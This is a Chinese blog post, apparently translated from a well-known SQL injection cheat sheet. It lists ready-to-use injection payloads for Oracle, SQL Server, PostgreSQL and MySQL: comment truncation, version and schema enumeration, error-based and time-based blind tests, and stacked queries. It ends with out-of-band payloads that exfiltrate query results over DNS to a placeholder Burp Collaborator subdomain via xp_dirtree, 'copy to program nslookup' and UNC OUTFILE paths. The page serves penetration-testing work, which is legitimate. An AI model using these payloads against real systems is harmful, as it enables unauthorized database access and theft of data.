mysql fuzzing_Tips-sql注入漏洞模糊测试

最新推荐文章于 2024-05-06 20:35:35 发布
最新推荐文章于 2024-05-06 20:35:35 发布
阅读量432 收藏
点赞数
文章标签: mysql fuzzing
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33518100/article/details/113493632
版权

# Tips-sql注入模糊测试

该清单中包含一些安全从业人员常用的,针对指定数据库进行sql注入漏洞测试的payload,在安全测试的第一个阶段,我们可以借助外部的一些安全工具,比如nmap进行识别服务器端数据库的指纹信息,更有利于后续的模糊测试。

## 字符串串联

将多个字符串拼接在一起,返回一个新的字符串。

| Oracle | 'foo'||'bar' |

| ---------- | ---------------------------------------------------------- |

| Microsoft | 'foo'+'bar' |

| PostgreSQL | 'foo'||'bar' |

| MySQL | 'foo' 'bar' [注意两个字符串之间的空格] CONCAT('foo','bar') |

## 子串

从具有指定长度的偏移量中提取字符串的一部分。请注意,偏移索引是基于1的。以下每个表达式将返回字符串ba。

| Oracle | SUBSTR('foobar', 4, 2) |

| ---------- | ------------------------- |

| Microsoft | SUBSTRING('foobar', 4, 2) |

| PostgreSQL | SUBSTRING('foobar', 4, 2) |

| MySQL | SUBSTRING('foobar', 4, 2) |

## 注释

使用注释来截断查询并删除原始输入之后的查询部分。

| Oracle | --comment |

| ---------- | ------------------------------------------------------ |

| Microsoft | --comment /*comment*/ |

| PostgreSQL | --comment /*comment*/ |

| MySQL | #comment -- comment [注意双破折号后的空格] /*comment*/ |

## 数据库版本

查询数据库确定其类型和版本。 在制定更为复杂的安全测试时,此信息非常重要。

| Oracle | SELECT banner FROM v$version SELECT version FROM v$instance |

| ---------- | ----------------------------------------------------------- |

| Microsoft | SELECT @@version |

| PostgreSQL | SELECT version() |

| MySQL | SELECT @@version |

## 数据库内容

列出数据库中存在的表,以及这些表中所包含的列。

| Oracle | SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |

| ---------- | ------------------------------------------------------------ |

| Microsoft | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |

| PostgreSQL | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |

| MySQL | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |

## 条件错误

测试单个布尔条件,如果条件为true,则触发数据库错误。

| Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual |

| ---------- | ------------------------------------------------------------ |

| Microsoft | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END |

| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END |

| MySQL | SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') |

## 批量(或堆叠)查询

使用批量查询来连续执行多个数据库语句。 注意,在执行后续查询时,结果不会直接返回给应用程序。 因此,该技术主要用于与sql盲注漏洞有关的问题,在该漏洞中,可以使用二次查询来触发DNS查询,条件错误或时间延迟。

| Oracle | Does not support batched queries. |

| ---------- | --------------------------------- |

| Microsoft | QUERY-1-HERE; QUERY-2-HERE |

| PostgreSQL | QUERY-1-HERE; QUERY-2-HERE |

| MySQL | Does not support batched queries. |

## 时间延迟

处理sql查询时,可能导致数据库中的时间延迟。 以下情况将导致10秒的无条件时间延迟。

| Oracle | dbms_pipe.receive_message(('a'),10) |

| ---------- | ----------------------------------- |

| Microsoft | WAITFOR DELAY '0:0:10' |

| PostgreSQL | SELECT pg_sleep(10) |

| MySQL | SELECT sleep(10) |

## 有条件的时间延迟

可以测试单个布尔条件,并在条件为真时触发时间延迟。

| Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'\|\|dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual |

| ---------- | ------------------------------------------------------------ |

| Microsoft | IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' |

| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END |

| MySQL | SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') |

## DNS查询

可以利用查询语句使数据库对外部域执行DNS查询。 为此,将需要使用Burp Collaborator客户端生成,在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器,以确认是否真实发生了DNS查找。

| Oracle | 以下技术利用了XML外部实体注入: SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> %remote;]>'),'/l') FROM dual 以下技术适用于完全修补的Oracle安装,但需要管理员权限: SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')/ |

| ---------- | ------------------------------------------------------------ |

| PostgreSQL | copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net' |

| MySQL | 以下技术仅适用于Windows: LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a') SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a' |

## DNS查找与数据渗透

可以使数据库对包含注入查询结果的外部域执行DNS查找。 为此,将需要使用Burp Collaborator客户端生成将在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器以检索任何DNS交互的详细信息,包括被泄露的数据。

| Oracle | SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> %remote;]>'),'/l') FROM dual |

| ---------- | ------------------------------------------------------------ |

| Microsoft | declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"') |

| PostgreSQL | create OR replace function f() returns void as $$ declare c text; declare p text; begin SELECT into p (SELECT YOUR-QUERY-HERE); c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net'''; execute c; END; $$ language plpgsql security definer; SELECT f(); |

| MySQL | The following technique works on Windows only: SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a' |

小离的私家笔记
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fuzzing-模糊测试--强制性安全漏洞发掘
05-09
模糊测试中,用随机坏数据(也称做 fuzz)攻击一个程序,然后等着观察哪里遭到了破坏。模糊测试的技巧在于,它是不符合逻辑的:自动模糊测试不去猜测哪个数据会导致破坏(就像人工测试员那样),而是将尽可能多的...
SQL 注入漏洞(五)union 联合注入
不秃头的程序Yang
06-11 1990
1、联合查询的错误方式 4、联合查询注入获取敏感信息 6、通过 information_schema 获取表
asp.net request防sql注入_安全漏洞大揭秘:手把手教你轻松防止SQL注入
weixin_39906878的博客
11-16 592
安全漏洞大揭秘:手把手教你轻松防止SQL注入!SQL(结构化查询语言)注入是众所周知的软件弱点和安全漏洞,如果不是的话,也是最出名的漏洞之一。尽管享有盛名,但如何防止SQL注入仍然是主要漏洞之一,并且攻击持续增长。查找SQL注入根据OWASP Top 10,注入漏洞(其中SQL注入是其中一种)是Web应用程序安全性的头号问题。SQL注入在CWE Top 25中排名第六。其他类型的安全漏洞示例包括:...
2024年网络安全最全Fuzzing技术分析_fuzz技术(1),2024年最新看完这一篇你就懂了
最新发布
2401_84281655的博客
05-06 678
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
SQL注入备忘单
石页
01-07 609
记录PortSwigger的SQL注入备忘单 SQL注入备忘单 此备忘单包含有用的语法示例,您可以使用它们来执行执行 SQL 注入攻击时经常出现的各种任务。 字符串连接 您可以将多个字符串连接在一起以形成单个字符串。 甲骨文 'foo'||'bar' 微软 'foo'+'bar' PostgreSQL 'foo'||'bar' MySQL 'foo' 'bar'【注意两个字符串之间的空格】CONCAT('foo','bar') 子串 您可以从具有指定长..
如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞
weixin_34185512的博客
09-13 5631
本文讲的是如何使用Burp Suite模糊测试SQL注入、XSS、命令执行漏洞,今天我将使用打包的套件攻击工具对bwapp应用程序进行模糊测试,手动执行此测试是一个耗时的时间,可能对任何一个渗透性测试的安全人员来说都是无聊的过程。 模糊测试在软件测试中起着至关重要的作用,它是一种工具,用于通过将一组称为模糊的部分地址输入注入到要测试的应用程序的程序中来...
【JOOQ】解决模糊查询的sql注入问题
Qing__zi的博客
03-09 563
jooq模糊查询,解决sql注入
Fuzzing_模糊测试--强制性安全漏洞发掘
07-05
模糊测试,或Fuzzing,是一种用于发现软件安全漏洞的有效方法。它通过提供大量随机或变异的数据输入来测试程序,以找出潜在的错误和不稳定点。以下是对模糊测试及其相关知识点的详细解释: 1. **安全漏洞发掘方法学...
蛇噬汝果_-_基于Python的OSX内核漏洞模糊测试挖掘和利用.pdf
08-07
本演讲将介绍系统性模糊测试和挖掘OSX内核漏洞的方法,及如何利用Python提升模糊测试漏洞挖掘分析效率,并最终分析我们发现的数个OSX内核中的0day。我们将介绍如何利用Python实现自动化提取驱动攻击面和生成测试...
DBMS模糊测试工具使用指南dbms-fuzzing-scu-master
12-17
fuzzing 本工具仅包括Fuzzer部分,不包括插桩部分。插桩部分与AFL相同,具体使用方法请参考AFL。插桩时最好使用稀疏插桩,或对数据库关键模块进行插桩。如果用稀疏插桩,OpenGaussDB的插桩比例最好不高于10%。如果仅...
信息安全_数据安全_Fuzzing_AOSP_for_Non-crash_bugs.pdf
08-22
本报告关注的是如何利用Fuzzing技术来检测AOSP中的非崩溃性漏洞,这些漏洞虽不导致程序崩溃,但可能潜藏着安全隐患。 Fuzzing是一种广泛用于发现内存错误的有效方法,它通过生成大量随机或变异的数据输入来测试目标...
sql注入字典fuzz
01-11
sql注入字典fuzz
Fuzzing(模糊测试)技术,你真的了解吗?
m0_73736695的博客
10-31 699
模糊测试是一种针对软件安全的自动化测试方法,它主要的理念是追寻测试样例的变异,并通过海量的测试数据来覆盖更多的程序执行流,从而找到更多的安全问题。这本质的原因在于Fuzzing在做软件安全测试的时候,整体的粒度会更细,测试点会更多,判断位置也会更精准。类比于应用程序的检测,很多应用程序的源代码和二进制代码等也无法获得,在此场景下,黑盒模糊测试便是探测程序“内部构造”的有效方法,它通过在自动化任务中使用格式错误/半格式错误的数据注入来查找程序实现的错误。现代模糊测试解决方案可以分析它们要测试的代码的结构。
SQL注入-盲注
m0_53820621的博客
08-12 725
SQL注入-盲注
mysql注入fuzz字典_Fuzz安全狗注入绕过
weixin_33946174的博客
01-28 437
安全狗版本为: apache 4.0网站为: php+mysql系统: win 2003这里只要是fuzz /*!union 跟 select*/ 之间的内容:/*!unionselect*/位置很多可以选择。脚本语言你可以用你喜欢的, 我这里用perl6让我们一步步来。枸造 exp 我用如下代码(代码测试用):#!/bin/env perl6my @fuzz_sp = '/*','*/','/*...
渗透测试-SQL注入之Fuzz绕过WAF
lza20001103的博客
04-21 4369
渗透测试-SQL注入之Fuzz绕过WAF
sqlmap 注入字典_使用sqlmap进行sql注入
weixin_36377516的博客
12-30 658
简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取...
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5121
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值